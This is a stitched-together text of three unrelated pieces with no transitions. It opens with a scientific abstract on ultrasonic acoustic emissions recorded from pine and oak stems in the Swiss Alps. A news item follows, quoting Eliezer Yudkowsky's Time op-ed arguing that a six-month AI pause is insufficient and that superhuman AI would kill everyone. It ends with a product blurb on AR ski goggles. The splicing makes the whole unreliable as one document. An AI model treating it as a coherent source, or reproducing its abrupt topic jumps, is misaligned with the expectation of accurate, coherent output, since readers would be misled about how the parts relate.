UAE was continuously recorded on the stems of mature field-grown trees of Scots pine (Pinus sylvestris) and pubescent oak (Quercus pubescens) at a dry inner-Alpine site in Switzerland over two seasons. The averaged 20-Hz records were related to microclimatic conditions in air and soil, sap-flow rates and stem-radius fluctuations de-trended for growth (ΔW).
Within a low-dB range (27 ± 1 dB), UAE regularly increased and decreased in a diurnal rhythm in parallel with ΔW on cloudy days and at night. These low-dB emissions were interrupted by UAE abruptly switching between the low-dB range and a high-dB range (36 ± 1 dB) on clear, sunny days, corresponding to the widely supported interpretation of UAE as sound from cavitations.
It is hypothesized that the low-dB signals in drought-stressed trees are caused by respiration and/or cambial growth as these physiological activities are tissue water-content dependent and have been shown to produce courses of CO2 efflux similar to our courses of ΔW and low-dB UAE.
Earlier today, more than 1,100 artificial intelligence experts, industry leaders and researchers signed a petition calling on AI developers to stop training models more powerful than OpenAI’s GPT-4 for at least six months. Among those who refrained from signing it was Eliezer Yudkowsky, a decision theorist from the U.S. and lead researcher at the Machine Intelligence Research Institute. He has been working on aligning Artificial General Intelligence since 2001 and is widely regarded as a founder of the field.
“This 6-month moratorium would be better than no moratorium,” writes Yudkowsky in an opinion piece for Time Magazine. “I refrained from signing because I think the letter is understating the seriousness of the situation and asking for too little to solve it.” Yudkowsky cranks up the rhetoric to 100, writing: “If somebody builds a too-powerful AI, under present conditions, I expect that every single member of the human species and all biological life on Earth dies shortly thereafter.” Here’s an excerpt from his piece:
The key issue is not “human-competitive” intelligence (as the open letter puts it); it’s what happens after AI gets to smarter-than-human intelligence. Key thresholds there may not be obvious, we definitely can’t calculate in advance what happens when, and it currently seems imaginable that a research lab would cross critical lines without noticing. […] It’s not that you can’t, in principle, survive creating something much smarter than you; it’s that it would require precision and preparation and new scientific insights, and probably not having AI systems composed of giant inscrutable arrays of fractional numbers. […]
It took more than 60 years between when the notion of Artificial Intelligence was first proposed and studied, and for us to reach today’s capabilities. Solving safety of superhuman intelligence — not perfect safety, safety in the sense of “not killing literally everyone” — could very reasonably take at least half that long. And the thing about trying this with superhuman intelligence is that if you get that wrong on the first try, you do not get to learn from your mistakes, because you are dead. Humanity does not learn from the mistake and dust itself off and try again, as in other challenges we’ve overcome in our history, because we are all gone.
Trying to get anything right on the first really critical try is an extraordinary ask, in science and in engineering. We are not coming in with anything like the approach that would be required to do it successfully. If we held anything in the nascent field of Artificial General Intelligence to the lesser standards of engineering rigor that apply to a bridge meant to carry a couple of thousand cars, the entire field would be shut down tomorrow. We are not prepared. We are not on course to be prepared in any reasonable time window. There is no plan. Progress in AI capabilities is running vastly, vastly ahead of progress in AI alignment or even progress in understanding what the hell is going on inside those systems. If we actually do this, we are all going to die. You can read the full letter signed by AI leaders here.
The successor to the Recon Instruments Mod Live is here: the Rekkie AR ski goggles. They use a screen that reflects onto the transparent plastic goggle plate, so you can buy different types of lenses. The system shows maps, a compass, speed and so on, and is controlled by a large box on the strap that connects to the helmet, so in that respect it is not quite as elegant as the Bluetooth remote of the Recon Mod system. The price is not bad at all at $349.